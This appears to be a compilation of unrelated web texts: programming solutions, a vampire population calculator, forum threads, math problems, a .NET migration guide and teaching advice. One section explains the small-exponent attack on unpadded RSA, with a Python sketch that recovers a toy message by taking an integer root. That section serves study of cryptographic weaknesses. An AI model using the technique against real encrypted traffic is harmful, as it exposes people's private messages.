Now go back and think of it actually being some sort of "iMac Mini" costing even more, and you see why I'm not exactly keen on it.
Of course, it might be as wondrous as the Newton (which I would probably still use today if I had kept one), and all the points I've made above will wither away in a flood of coolness...
|
# UVA Live 3704 Cellular Automaton (Matrix Fast Exponentiation)
## Description
A cellular automaton is a collection of cells on a grid of specified shape that evolves through a number of discrete time steps according to a set of rules that describe the new state of a cell based on the states of neighboring cells. The order of the cellular automaton is the number of cells it contains. Cells of the automaton of order n are numbered from 1 to n.
The order of the cell is the number of different values it may contain. Usually, values of a cell of order m are considered to be integer numbers from 0 to m−1.
One of the most fundamental properties of a cellular automaton is the type of grid on which it is computed. In this problem we examine a special kind of cellular automaton — the circular cellular automaton of order n with cells of order m. We will denote this kind of cellular automaton as an n,m-automaton.
A distance between cells i and j in an n,m-automaton is defined as min(|i − j|, n − |i − j|). A d-environment of a cell is the set of cells at a distance not greater than d.
On each d-step, the values of all cells are simultaneously replaced by new values. The new value of cell i after a d-step is computed as the sum of the values of the cells belonging to the d-environment of cell i, modulo m.
The following picture shows 1-step of the 5,3-automaton.
## Input
The input file contains several test cases, each of them consists of two lines, as described below.
The first line of the input contains four integer numbers n, m, d, and k (1 ≤ n ≤ 500, 1 ≤ m ≤ 1000000, 0 ≤ d < n/2, 1 ≤ k ≤ 10000000).
The second line contains n integer numbers from 0 to m−1 — initial values of the automaton’s cells.
## Output
For each test case, write to the output, on a line by itself, the values of the n,m-automaton’s cells after k d-steps.
## Sample Input
5 3 1 1
1 2 2 1 2
5 3 1 10
1 2 2 1 2
## Sample Output
2 2 2 2 1
2 0 0 2 2
## Approach
One d-step is a linear map: each new value is the sum of the old values in the cell's d-environment mod m. The transition matrix is therefore circulant; for d = 1 it looks like

$$A = \begin{bmatrix} 1&1&0&\cdots&0&1 \\ 1&1&1&0&\cdots&0 \\ 0&1&1&1&\cdots&0 \\ \vdots& &\ddots&\ddots&\ddots&\vdots \\ 0&\cdots&0&1&1&1 \\ 1&0&\cdots&0&1&1 \end{bmatrix}$$

The answer is $A^k$ applied to the initial vector, computed with fast matrix exponentiation. Since the product of two circulant matrices is again circulant, it suffices to store and combine first rows only, so each multiplication costs O(n²) instead of O(n³), giving O(n² log k) overall.
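Before the fast solution, the rule itself can be sanity-checked against the sample by direct simulation. The following brute-force sketch (my own, for verification only; it is far too slow for k up to 10^7) reproduces the first sample:

```python
# Brute-force one d-step: each cell becomes the sum of its d-environment mod m.
# Only suitable for tiny inputs.
def step(cells, m, d):
    n = len(cells)
    return [sum(cells[(i + j) % n] for j in range(-d, d + 1)) % m
            for i in range(n)]

cells = [1, 2, 2, 1, 2]       # sample input: n=5, m=3, d=1
cells = step(cells, 3, 1)     # k = 1
print(*cells)                 # expected sample output: 2 2 2 2 1
```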
## AC Code
#include<bits/stdc++.h>
using namespace std;
typedef long long LL;

LL n, m, d, k;
// Every matrix involved is circulant, so only its first row is stored:
// np[t] is the first row of matrix number t.
LL np[500][500];
int idx = 0;

struct marx
{
    int tot; // index of this matrix's row in np
    marx() { tot = idx++; }

    // Circulant matrix a times the vector stored in row b:
    // result[i] = sum_j a[(j-i+n)%n] * b[j] (mod m).
    marx mult(const marx &a, const marx &b)
    {
        marx ans = marx();
        for (int i = 0; i < n; i++)
        {
            LL num = 0;
            for (int j = 0; j < n; j++)
                num = (num + (np[a.tot][(j - i + n) % n] * np[b.tot][j]) % m) % m;
            np[ans.tot][i] = num;
        }
        return ans;
    }

    // Product of two circulant matrices, stored as its first row.
    // (The index direction relies on the rows being symmetric, which holds
    // for the transition matrix of this problem and all of its powers.)
    marx mul(const marx &a, const marx &b)
    {
        marx ans = marx();
        for (int i = 0; i < n; i++)
            for (int j = 0; j < n; j++)
                np[ans.tot][i] = (np[ans.tot][i] + (np[a.tot][j] * np[b.tot][(j - i + n) % n]) % m) % m;
        return ans;
    }
};

// Fast exponentiation of a circulant matrix: a^e in O(n^2 log e).
marx mult(marx a, LL e)
{
    marx ans = marx();
    np[ans.tot][0] = 1; // first row of the identity matrix
    while (e)
    {
        if (e & 1) ans = ans.mul(ans, a);
        a = a.mul(a, a);
        e >>= 1;
    }
    return ans;
}

int main()
{
    ios::sync_with_stdio(false);
    while (cin >> n >> m >> d >> k)
    {
        memset(np, 0, sizeof(np));
        idx = 0;
        marx ans = marx();
        for (int i = 0; i < n; i++)
            cin >> np[ans.tot][i]; // initial cell values as a vector
        marx ap = marx();
        for (int j = -d; j <= +d; j++)
            np[ap.tot][(j + n) % n] = 1; // first row of the transition matrix A
        ans = ans.mult(mult(ap, k), ans); // A^k applied to the initial vector
        for (int i = 0; i < n; i++)
            cout << np[ans.tot][i] << ((i != n - 1) ? " " : "\n");
    }
    return 0;
}
|
# Vampire Apocalypse Calculator
Created by Dominik Czernia, PhD
Reviewed by Bogna Szyk and Jack Bowater
Last updated: Feb 09, 2023
Welcome to the vampire apocalypse calculator, you lovely, tasty human. This sophisticated tool is based on the predator-prey model, a model which successfully describes the dynamics of ecosystems, chemical reactions, and even economics. Now it's time to use it to answer the question: what if vampires were among us? You might think we're joking, but the facts are clear. If we compare the actual growth of the human population (red points) to the exponential growth model (blue line), it reveals there are some hidden causes preventing the expansion of humanity.
We could theorize all day why this is, but there's one idea we'd like to check and discuss: vampires. Are you ready to unveil the ancient mysteries of vampirism?
## What is vampirism?
Nearly every culture around the world has its blood-drinking creature. The ancient world had the female demons Lilith (Babylonia) and Lamia (Greece). In Africa, Ewe folklore tells of the Adze - a vampiric being that can take the form of a firefly. The Chilean Peuchen was a gigantic flying snake that could paralyse its victims, and, in Asia, the Penanggal was a woman who broke a pact with the devil and was forever cursed to become a bloodsucking demon. So, why is it that vampires are known around the globe? Isn't it suspicious?
What about the vampires themselves? They are usually believed to be undead creatures with supernatural powers; they don't age, can fly, and can fully regenerate from almost any wound. They have a taste for human blood, but are afraid of sunlight, silver, religious symbols, and garlic. Vampires can be killed by decapitation or a wooden stake through the heart. The last important thing is that vampires can't reproduce - they can only turn a human into a vampire.
## How to use the vampire apocalypse calculator?
What if vampires were among us? The vampire apocalypse calculator allows you to check how humanity would fare in selected scenarios from popular books and movies, as well as to create your own story from scratch. It's your decision! We present the result in the form of a graph that plots how three populations change: humans (blue points), vampires (red points), and vampire slayers (yellow points). Adjust the graph if needed by setting an appropriate time scale (days, weeks, months, years, decades, centuries) and type of chart (linear or logarithmic).
The vampire apocalypse calculator performs real-time numerical calculations that might sometimes be a little demanding, depending on your machine specifications. But, please, be understanding! The algorithm can receive up to 13 parameters from the three species:
1. Humans - if not interrupted by vampires, their population size will grow exponentially. The available settings are the initial population, the probability of turning into a vampire when attacked, and annual population growth. Humans' unique ability is to grow faster when their population becomes smaller than its starting value.
2. Vampires - bloodthirsty humanoids that hunt people and turn them into new vampires. The available parameters are their initial population and their aggression level towards humans and slayers. You can make vampires smarter with their special ability. When activated, vampires will refrain from killing too many humans, so they do not lose their only source of blood.
3. Vampire slayers - an organization of brave people with one objective: save the world from vampiric domination. The available parameters are their initial population, annual recruitment speed, aggression level towards vampires, and vampire transformation probability. The organization cannot afford its members' salaries if the entire world becomes vampire hunters, so you can turn on the vampire slayers' special ability to limit the maximum size of the organization.
Go ahead and test our vampire apocalypse calculator! If you find a set of parameters that creates an incredible story, don't hesitate and share it with your friends and us. You can use the Send this result button just below the graph.
For example, let's build a custom scenario (Select a scenario: Custom). Take a city with one million people (Humans - Initial population: 1,000,000) that is growing every year at a typical speed (Humans - Annual population growth: current (1% per year)). Suddenly, 200 vampires (Vampires - Initial population: 200) invade it and start attacking people from time to time (Vampires - vs. humans: common attacks), with a human-vampire transformation probability of one half (Humans - Transformation probability: 50%). What can you see on the resulting graph? Actually, not much; the time scale is too short. After increasing it (Time scale: decades), the picture is entirely different! You can see that mankind will be wiped out after about 48 decades. Now, how many vampire slayers would you need to save humanity? Try playing with different options!
🙋 Why not create your own Minecraft vampire world? Take a look at the Minecraft circle generator or the Nether portal calculator to help you with some of the details! 🦇
## Predator-prey model: Lotka-Volterra equations
Italian astronomer and physicist Galileo Galilei (known for his experiments with falling bodies and inclined planes) once said Mathematics is the language in which God has written the universe. Indeed, scientists all around the world try to find suitable mathematical equations that describe the natural world properly.
If you consider a simple ecosystem with two species, e.g., foxes and rabbits, the Lotka-Volterra equations generally work just fine. They are also called the predator-prey model. Why? Let's stick with our example. The population of rabbits can peacefully live and reproduce if we assume that they have access to an unlimited source of food in the forest. On the other hand, foxes are carnivorous, so their population size depends on the accessibility of food, i.e., rabbits. Can you see where the problem is? More rabbits mean more foxes, but more foxes mean fewer rabbits.
A similar situation exists with humans (prey) and vampires (predators). Our calculator makes use of the Lotka - Volterra equations, with a few modifications. First of all, we created some vampire slayers that control the population of vampires. Secondly, we gave each group a special ability that is implemented indirectly in the algorithm. Eventually, we came up with the following differential equations:
\begin{align*} \frac{\mathrm{d}x}{\mathrm{d}t} &= x \left(\mathrm{k_1} - \mathrm{a_1} y\right) \\[10pt] \frac{\mathrm{d}y}{\mathrm{d}t} &= y \left(\mathrm{b_1 a_1} x + \mathrm{b_2 a_2} z - \mathrm{c}z\right) \\[10pt] \frac{\mathrm{d}z}{\mathrm{d}t} &= z \left(\mathrm{k_2} - \mathrm{a_2} y\right) \\[10pt] \end{align*}
where:
• $x$, $y$, and $z$ are the sizes of the human, vampire, and vampire slayers populations respectively.
• $\mathrm{k_1}$ and $\mathrm{k_2}$ are the growth rates of the human and vampire slayer populations.
• $\mathrm{b_1}$ and $\mathrm{b_2}$ are the probabilities that a human and a vampire slayer will turn into a vampire.
• Coefficients $\mathrm{a_1}$, $\mathrm{a_2}$, and $\mathrm{c}$ describe the aggression levels: vampire towards a human, vampire towards vampire slayer, and vampire slayer towards vampire respectively.
For more explanations, see the article on this model published in Applied Mathematical Sciences. We based this calculator on the fourth-order Runge-Kutta method to solve this system of differential equations.
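As a concrete illustration, here is a minimal sketch of that integration in Python. The parameter values and the daily step size are illustrative assumptions loosely mirroring the custom scenario above, not the calculator's actual internals.

```python
# Classic fourth-order Runge-Kutta for the modified Lotka-Volterra system
# above: x = humans, y = vampires, z = vampire slayers.
def f(state, k1=0.01, k2=0.02, a1=1e-6, a2=1e-6, b1=0.5, b2=0.1, c=1e-4):
    x, y, z = state
    dx = x * (k1 - a1 * y)
    dy = y * (b1 * a1 * x + b2 * a2 * z - c * z)
    dz = z * (k2 - a2 * y)
    return (dx, dy, dz)

def rk4_step(state, h):
    def shift(s, q, w):  # s + w*q, componentwise
        return tuple(si + w * qi for si, qi in zip(s, q))
    s1 = f(state)
    s2 = f(shift(state, s1, h / 2))
    s3 = f(shift(state, s2, h / 2))
    s4 = f(shift(state, s3, h))
    return tuple(v + h / 6 * (a + 2 * b + 2 * c + e)
                 for v, a, b, c, e in zip(state, s1, s2, s3, s4))

state = (1_000_000.0, 200.0, 0.0)  # the custom scenario from the text
for _ in range(365):               # one year in daily steps
    state = rk4_step(state, 1.0)
print(state)
```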
## Bloodsuckers - are vampires among us?
There are species in the animal kingdom that suck and feed on prey's blood. We call this practice hematophagy, and many small animals prefer it since blood is basically a fluid tissue rich in nutrients. What's the main difference between animal bloodsuckers and fictitious vampires? The former can't turn a victim into another creature by biting or killing it. Lucky for us! Some known bloodsucking animals are:
• Vampire Bats - they mainly hunt birds and reptiles, but they occasionally turn their fangs on humans. Interestingly, vampire bats often share the blood that they have sucked with their hungry compatriots. That's a real friendship!
• Leeches - bloodsucking worms that live in water. They can be used medicinally, as they can restore blood flow to damaged veins.
• Vampire Finches - don't let these lovely looking birds deceive you! When other food sources are scarce, they sometimes feed by drinking the blood of other bigger birds.
• Mosquitoes - flying insects that you're probably familiar with. They can be dangerous to humans since mosquitoes can carry many diseases. An interesting fact is that only female mosquitoes suck blood from their victims (they need it to fuel egg production).
Humans also practice hematophagy! There are meals that contain animal blood. For example, some societies around the world eat blood sausages - sausages filled with blood that has been cooked or dried. With that, we can conclude that vampires are actually among us! (of course, it's only a half-truth; real bloodsuckers can't turn people into vampires).
The default scenario is the Stoker-King model, inspired by Bram Stoker's Dracula and Stephen King's Salem's Lot. In 1897 (the year Stoker's novel was first published) the world population was about 1,650 million people. In this scenario we assume only one vampire at the beginning. The vampire attacks a victim that eventually becomes another vampire.
The selected scenario is an example of an epidemic outbreak that might be caused by a deadly virus 😷. The increase in vampire population inevitably leads to the demise of mankind. The 13th month is the crucial point, where the explosive growth of vampires wipes out mankind in about half a year.
It's all over. The expansion of vampires is unstoppable 🧛. Bloodsuckers have control of the world, killing the last human after 30.8 months ⚰️. But don't lose hope! Try to recruit some vampire slayers and save mankind 💪.
|
Équations hyperboliques non linéaires
Séminaire Équations aux dérivées partielles (Polytechnique) dit aussi "Séminaire Goulaouic-Schwartz" (1977-1978), Exposé no. 18, 18 p.
@article{SEDP_1977-1978____A19_0,
author = {Tartar, L.},
title = {\'Equations hyperboliques non lin\'eaires},
journal = {S\'eminaire \'Equations aux d\'eriv\'ees partielles (Polytechnique) dit aussi "S\'eminaire Goulaouic-Schwartz"},
note = {talk:18},
publisher = {Ecole Polytechnique, Centre de Math\'ematiques},
year = {1977-1978},
zbl = {0385.35044},
mrnumber = {504147},
language = {fr},
url = {http://archive.numdam.org/item/SEDP_1977-1978____A19_0/}
}
Tartar, L. Équations hyperboliques non linéaires. Séminaire Équations aux dérivées partielles (Polytechnique) dit aussi "Séminaire Goulaouic-Schwartz" (1977-1978), Exposé no. 18, 18 p. http://archive.numdam.org/item/SEDP_1977-1978____A19_0/
R. Courant, K.O. Friedrichs: Supersonic flow and shock waves. Interscience Publ. New York (1948). | MR 29615 | Zbl 0041.11302
The important contributions of the American school from 1957 to 1970: P.D. Lax: Hyperbolic systems of conservation laws. Comm. Pure Appl. Math. 10 (1957) 537-566. | Zbl 0081.08803
P.D. Lax: Development of singularities of solutions of non linear hyperbolic partial differential equations. J. Math. Phys. 5 (1964) 611-613. | MR 165243 | Zbl 0135.15101
J. Glimm: Solutions in the large for non linear hyperbolic systems of equations. Comm. Pure Appl. Math. 18 (1965) 697-715. | MR 194770 | Zbl 0141.28902
J. Glimm, P.D. Lax: Decay of solutions of systems of non linear hyperbolic conservation laws. Memo. Amer. Math. Soc. 101 (1970). | MR 265767 | Zbl 0204.11304
O.A. Oleinik: On the uniqueness of the generalized solution of the Cauchy problem for a non linear system of equations occurring in mechanics. Usp. Mat. Nauk 12 (78) (1957) 169-176. | MR 94543 | Zbl 0080.07702
S.K. Godunov: Bounds on the discrepancy of approximate solutions constructed for the equations of gas dynamics. Zhur Vychisl. Mat i Fiz 1 (1961) 623-637. | MR 148242 | Zbl 0133.19803
A.I. Volpert: The spaces BV and quasilinear equations. Mat. Sb 73 (1967) 255-302. | MR 216338 | Zbl 0168.07402
S.N. Kruzhkov: First order quasilinear equations in several independent variables. Mat. Sb. 81 (1970) 228-255. | MR 267257 | Zbl 0202.11203
P.D. Lax: Shock waves and entropy dans Contribution to Nonlinear Functional Analysis, ed. par E. A. Zarantonello, Academic Press, New York (1971) 603-634. | MR 393870 | Zbl 0268.35014
C.C. Conley, J.A. Smoller: Shock waves as limits of progressive wave solutions of higher order equations. Comm. Pure Appl. Math. 24 (1971) 459-472. | MR 283414 | Zbl 0233.35063
C.M. Dafermos: The entropy rate admissibility criterion for solutions of hyperbolic conservation laws. J. Diff. Eq. 14 (1973) 202-212. | MR 328368 | Zbl 0262.35038
C.C. Conley, J.A. Smoller: On the structure of magnetohydrodynamic shock waves. Comm. Pure Appl. Math. 27 (1974) 367-375. | MR 368586 | Zbl 0284.76080
|
# Geometry (Thailand Math POSN 2nd round)
Write a full solution.
1. Let $H$ be the orthocenter of $\triangle ABC$ and let $I,J,K$ be the midpoints between $H$ and each vertex $A,B,C$ respectively. If $P$ is a point on the circumcircle of $\triangle ABC$ other than the vertices $A,B,C$, and $M$ is the midpoint between $P$ and $H$, prove that $I,J,K,M$ lie on the same circle.
2. Let the tangents to the circumcircle of $\triangle ABC$ at points $B,C$ intersect at point $D$. Prove that $\overline{AD}$ is the symmedian line of $\triangle ABC$.
3. Let $P,Q$ be two points that are isogonal conjugates of each other in $\triangle ABC$. Suppose $\overline{PP_{1}}$ and $\overline{QQ_{1}}$ are perpendicular to $\overline{BC}$ at points $P_{1}$ and $Q_{1}$ respectively, $\overline{PP_{2}}$ and $\overline{QQ_{2}}$ are perpendicular to $\overline{CA}$ at points $P_{2}$ and $Q_{2}$ respectively, and $\overline{PP_{3}}$ and $\overline{QQ_{3}}$ are perpendicular to $\overline{AB}$ at points $P_{3}$ and $Q_{3}$ respectively. Prove that $P_{1},P_{2},P_{3},Q_{1},Q_{2},Q_{3}$ lie on the same circle, and that the center of that circle is the midpoint of $P$ and $Q$.
4. Let $I,N,H$ be the incenter, the center of the nine-point circle, and the orthocenter of $\triangle ABC$ respectively. Construct $\overline{ID}, \overline{NM}$ perpendicular to $\overline{BC}$ at points $D,M$ respectively. If $\overline{AH}$ intersects the circumcircle of $\triangle ABC$ at point $K$ and $Y$ is the midpoint of $\overline{AK}$, prove that $|ID - NM| = \left|r - \dfrac{AY}{2}\right|$ where $r$ is the inradius of $\triangle ABC$.
5. Let $U$ be the foot of the altitude of $\triangle ABC$ from point $A$. If $U',U''$ are the reflections of $U$ across $\overline{CA},\overline{AB}$ respectively, and $\overline{U'U''}$ intersects $\overline{CA},\overline{AB}$ at points $V,W$ respectively, prove that $\overline{BV},\overline{CW}$ are perpendicular to $\overline{CA},\overline{AB}$ respectively.
This note is a part of Thailand Math POSN 2nd round 2015.
Note by Samuraiwarm Tsunayoshi
5 years, 10 months ago
The first question can be solved using homothety. The points $A,B,C$ and $P$ lie on the circumcircle. So consider a homothetic transformation of the circumcircle about the orthocenter that shrinks the circle to half of its radius. The midpoints of $H$ and $A,B,C,P$ will lie on this circle. This is the nine-point circle of the triangle.
- 5 years, 1 month ago
Hi Pranav, do I know you? I know a Pranav Rao and he is from Mumbai too. This is Shrihari.
- 5 years, 1 month ago
|
# I am trying to make a random colored head but it doesn't work?
I'm trying to make it so when the user joins, they will have a random colored head. Here's my script:
local Player = game:GetService("Players")
Player.PlayerAdded:Connect(function(player)
    player.Character.Head.BrickColor = BrickColor.Random()
end)
Edited 1 year ago
There is a typo on line 3, do this instead:
player.Character.Head.BrickColor = BrickColor.random()
remember that function calls are case-sensitive
edit: you should also do this every time the player's character is added because as it stands it will do one of two things:
• give an error because the player is added before the character is
• if the character exists, this will only happen once and if the person dies, resets their character, etc. their head will go back to normal
so try this:
local Player = game:GetService("Players")
Player.PlayerAdded:Connect(function(player)
    player.CharacterAdded:Connect(function(character)
        character.Head.BrickColor = BrickColor.random()
    end)
end)
it still doesn't work. It's a localscript in ServerScriptService. CountOnMeBro 51 — 1y
LocalScripts run on the client side and do not work under ServerScriptService. Put this in a regular (server-side) script. You should use Scripts for things you want everyone in the game to see (so, most things), and LocalScripts are mainly for GUIs and other things that are unique to each person OfficerBrah 494 — 1y
i put a script in ServerScriptService and it still doesnt work CountOnMeBro 51 — 1y
I tested this in Studio and it works when you put wait() before line 4, so I guess Roblox overrides the head's color when the character is initially created and that's why it doesn't work without the wait() OfficerBrah 494 — 1y
local Char = game.Players.LocalPlayer.Character
|
# QT Programming with Debian or Ubuntu Linux - a problem
1. Jun 18, 2008
### Pollywoggy
I am running Kubuntu Hardy Heron and I have the same problem I had with Debian, that the Qt packages put the libs and includes all over the place, not in one place such as /usr/lib and /usr/include
This means that I can't set QTDIR unless I obtain the Qt sources and compile and install in /usr/local/qt but that is a waste of disk space.
Is there a way to get source code requiring Qt to compile without having to install a second Qt?
2. Jun 18, 2008
### shoehorn
This sounds strange. Firstly, no, you don't need to compile Qt from source in order to install the libraries. Synaptic should have a list of the Qt packages - make sure you install the dev packages as well.
As far as I can recall, Hardy places Qt in /usr/share/qt4 (there are also Qt3 libraries in /usr/share/qt3, but presumably you're working with the latest Qt and don't need these). You don't say precisely what it is that you need to know $QTDIR for, but I'll assume you're trying to compile some sources that rely on the Qt libraries. Have you tried passing Code (Text): ./configure --with-qtdir=/usr/share/qt4 prior to building? There are symlinks in that directory that tell the compiler that the Qt libraries and includes are in /usr/share/lib and /usr/share/include. Alternatively, you could always just set$QTDIR to the above in your .bashrc.
3. Jun 18, 2008
### Pollywoggy
It's not a problem when I am compiling source code that comes with a configure script; the script knows where to find the libs and includes. It is a problem when I try to compile code from a tutorial or book.
I am going to try your suggestion of setting QTDIR to /usr/share/qt4
thanks
4. Jun 18, 2008
### Pollywoggy
I think I am on the right track now and all the compile errors have to do with KDE and not Qt.
This means I need to do for KDE something along the lines of what I did for Qt, following the ideas you gave.
thanks
5. Jun 18, 2008
### Pollywoggy
Solved
I set KDEDIR to /usr/lib/kde4 and this did the trick. I will put that in my ~/.bashrc, and the QTDIR as well, and also add $QTDIR/bin and $KDEDIR/bin to my PATH.
6. Jun 18, 2008
|
path: root/bpkg/pkg-build.cli
Diffstat (limited to 'bpkg/pkg-build.cli'):

 bpkg/pkg-build.cli | 43 +++++++++++++++++----------
 1 file changed, 25 insertions, 18 deletions
diff --git a/bpkg/pkg-build.cli b/bpkg/pkg-build.cli
index e247f47..0ac8dcb 100644
--- a/bpkg/pkg-build.cli
+++ b/bpkg/pkg-build.cli
@@ -56,21 +58,25 @@
- bpkg build foo libfoo/1.2.3
+ bpkg build foo libfoo/1.2.3 "bar < 2.0.0"

[Remaining hunks (@@ -13,7 +13,8 @@, @@ -25,12 +26,13 @@, @@ -91,8 +97,9 @@, @@ -125,7 +132,7 @@) reword the surrounding documentation: a package version specification may now be either an exact version or a version constraint as described in bpkg#package-version-constraint, and a system version of '/*' is treated as unknown but satisfying any version constraint. The angle-bracket grammar placeholders did not survive extraction.]

Packages (both built to hold and as dependencies) that are specified with an explicit package version specification or as an archive or directory will have their versions held, that is, they will not be automatically upgraded.
|
# [tex-live] Problem reinstalling TexLive
Nicolas Richard theonewiththeevillook at yahoo.fr
Wed Jul 4 14:42:46 CEST 2012
Marc Doroja <marcdoroja at yahoo.com> writes:
> http://i206.photobucket.com/albums/bb184/Chemicalist011/texliveprob.png
>
> I have tried changing my PATH variables
The current PATH variable you have seems broken to me: it does not point
to anything that could contain the usual Windows executables.
In fact, you should not need to play with the PATH variable (the TL
installer takes care of it for you afaik), but if you do play with it in
a script then it's something like PATH=%path%;c:\new\path\ (note the
first part, %path%, which ensures that you are not overwriting the
previous definition). "The way to do it" on Windows 7, however, is via a
settings dialog (google "change path windows 7" for the steps).
hth
--
N.
|
# Small exponent attack
This is one of the simplest attacks on RSA, and it arises when m^e is less than n (here m is the message, e the public exponent, and n the modulus). In that case the reduction modulo n never actually happens, and the encryption reduces from the usual (m^e) % n to just m^e. The ciphertext is therefore exactly m^e, which means m can be recovered as the e-th root of the ciphertext (e.g. 2^4 = 16 implies 2 is the fourth root of 16).
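To make this concrete, here is a minimal Python sketch of the attack (the values of m, e and n are illustrative, and `int_nth_root` is a helper written for this example):

```python
# Small-exponent attack sketch: when m**e < n, c = m**e exactly,
# so m is recovered as the integer e-th root of the ciphertext.
def int_nth_root(x, n):
    """Largest integer r with r**n <= x, via binary search."""
    lo, hi = 0, 1 << (x.bit_length() // n + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** n <= x:
            lo = mid + 1
        else:
            hi = mid
    return lo - 1

e = 3
m = 42                 # toy message
n = 10 ** 30           # modulus, much larger than m**e
c = pow(m, e, n)       # "encryption"; equals m**e since m**e < n
assert int_nth_root(c, e) == m
```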
|
# Migrate from .NET Core 2.0 to 2.1
This article shows you the basic steps for migrating your .NET Core 2.0 app to 2.1. If you're looking to migrate your ASP.NET Core app to 2.1, see Migrate from ASP.NET Core 2.0 to 2.1.
For an overview of the new features in .NET Core 2.1, see What's new in .NET Core 2.1.
## Update the project file to use 2.1 versions
• Open the project file (the *.csproj, *.vbproj, or *.fsproj file).
• Change the target framework value from netcoreapp2.0 to netcoreapp2.1. The target framework is defined by the <TargetFramework> or <TargetFrameworks> element.
For example, change <TargetFramework>netcoreapp2.0</TargetFramework> to <TargetFramework>netcoreapp2.1</TargetFramework> (see the sketch after this list).
• Remove <DotNetCliToolReference> references for tools that are bundled in the .NET Core 2.1 SDK (v 2.1.300 or later). These references include:
In previous .NET Core SDK versions, the reference to one of these tools in your project file looks similar to the following example:
<DotNetCliToolReference Include="Microsoft.EntityFrameworkCore.Tools.DotNet" Version="2.0.0" />
Since this entry isn't used by the .NET Core SDK any longer, you'll see a warning similar to the following if you still have references to one of these bundled tools in your project:
The tool 'Microsoft.EntityFrameworkCore.Tools.DotNet' is now included in the .NET Core SDK. Here is information on resolving this warning.
Removing the <DotNetCliToolReference> references for those tools from your project file fixes this issue.
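To make both edits concrete, here is an illustrative before/after sketch of a minimal project file; the surrounding file contents are assumptions, and the tool reference shown is the one from the example above:

```xml
<!-- Before: targets 2.0 and still references a now-bundled CLI tool. -->
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>netcoreapp2.0</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <DotNetCliToolReference Include="Microsoft.EntityFrameworkCore.Tools.DotNet" Version="2.0.0" />
  </ItemGroup>
</Project>

<!-- After: targets 2.1; the bundled-tool reference is removed entirely. -->
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>netcoreapp2.1</TargetFramework>
  </PropertyGroup>
</Project>
```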
|
# Theorems of large deviations in the approximation by an infinitely divisible law
## Bibtex
@article{CIS-152978,
Author = {Aleškevičienė, A. and Statulevičius, V.},
Title = {Theorems of large deviations in the approximation by an infinitely divisible law},
Journal = {Acta Applicandae Mathematicae},
Volume = {58},
Year = {1999},
Pages = {61--73},
Keywords = {Large deviations}
}
|
# What is the ideal teaching style for Calculus exercises only?
A Calculus class for 1st-year students may have two subclasses (with two different lecturers):
• The main class (which covers the theory and concepts),
• and the 'response' class (which demonstrates and explains how to solve the exercise problems)
For the latter, what is the ideal way to teach?
Some logical ideas that have been thought of are:
• Give them problems (homework) and call some students forward to work on the board in the next meeting
• Give open book quizzes (open book so that the students are also studying at the same time)
• Give as many problems and explanations as possible? (Does this sometimes make students lazy, or not?)
• Some facts: several students who rarely focus on the lecture (skip classes, or even work on other things in class) have higher grades. I presume that online resources (such as Khan Academy, YouTube, ...) work better for them?
• Use slides or the board?
Thanks.
• "Some facts : several students that rarely focus on the lecture (skip classes, or even working on other things inside the class) have higher grades. I presume that online resources (such as Khan Academy, Youtube, ... works better for them?" Rather than online videos, they may be working problems from the textbook. Or they may just be students with prior experience...common nowadays. – guest Mar 23 '18 at 22:23
• Your question feels very broad--so many subquestions related to what is called "discussion section" in the US. Is this a theoretical question or related to your job? What country and level of school? Also, how much of a time split is there between the main lectures and the discussion sections. And is any problem solving work being done in the main lectures or is it purely derivations and theory: it affects if you can do less examples and more practice in discussion sections. – guest Mar 23 '18 at 22:27
• @guest thanks. The response class is only 2 hours in 1 meeting per week, the main class is 3 hours in 1 meeting per week. The focus is on the ideal / best known ways, undergraduate level. – Arief Anbiya Mar 25 '18 at 18:23
• When solving problems (point 3) I oftentimes combine real solutions with fallacious ones and ask them to figure out what went wrong. For example, one can calculate $\lim_{x \to \infty} \frac{x + \cos x}{x} = 1$; however, applying L'Hôpital leads to $\lim_{x \to \infty} 1 -\sin x$ which does not exist. Hence, we "prove" that $1$ does not exist. This usually grabs the attention of students that get bored by solving problems and promotes the thought-process when asked to figure out "what went wrong" (either in-class or homework). – Rodrigo Zepeda Mar 30 '18 at 0:29
• @RodrigoZepeda thanks. But another problem would be the students sometimes disengaged if they meet something that is quite "intimidating", also they like to talk to each other so much. I think i can scale your example.. – Arief Anbiya Mar 31 '18 at 16:09
My approach would likely be as follows:
1. Reserve time for questions. In my experience this will not actually take much of the time. Don't be afraid to not answer certain questions. For example, "what do you think is on the next test" is usually not wise to entertain. Unless you are writing the test and have a specific sense of how to use that question to leverage studying. For example, I will sometimes ask in return, "well, tell me something you're not done studying".
2. Prepare a few examples to give lecture style. Perhaps just 1/3 of the time for this, but it assures there is real content delivered. This could be at the beginning, middle or end, in fact all three of these can be rearranged as you see fit for your audience and setting.
3. Put all the students names on 3x5 cards. Write about 5-10 problems on the board and randomly select names to work those problems. Give them 10 or so minutes and emphasize that everybody should be trying to work through the problems to follow along. When the time is up, go through the problems critiquing both answers and presentation. Mark the cards with dates and short description for your record. Next time, go to new students, or for fun repeat to keep them on their toes. Eventually everybody comes up front to work problems in this fairly low-pressure setting. This works best if you have some course points to assign. If you have no influence over their grade then sadly I have not much hope. I mean, try talking to people anywhere about math for 2 hours when you have no control over their grade. You'll find yourself alone in a room long before the end. (statistically, people are rarely mathematicians, so the sentence before is said in that manner of thinking)
The benefit of 3. is it gives them incentive to work on the class regularly and it gives you a chance to warn against common mistakes and/or to show better ways to solve the given problems. Finally, it is probably useful for the students to see that everybody (for the most part) struggles with the material. Too often students refuse to ask questions because they think they are alone in their confusion. In fact, the confusion is the rule. Ideally, this process helps some of the students to start asking good questions. We probably need to teach them what is a "good question", but I'll leave that for another post.
• Awesome tactical suggestions. Moral plus one. – guest Mar 26 '18 at 3:01
• @guest thanks. I've been toying with this technique this semester (3.) It works annoyingly well, or I have a really good class, not sure which yet. – James S. Cook Mar 26 '18 at 3:03
• "ride the winning horse" ;-) – guest Mar 26 '18 at 3:43
• @TheChef i am 8 years difference with the students, would it still be effective..? I usually give homeworks, but very few that wants to come forward in class to show their solutions. How do u handle uncooperative students, especially in class? – Arief Anbiya Mar 26 '18 at 14:19
• Arief: Do problems in class and call on students or bring them to the board. You don't have to do it 100% of the time, but do enough to get them involved. This also uses their time effectively. They are actually practicing IN CLASS. Remember they do not have unlimited time outside of class. – guest Mar 29 '18 at 16:01
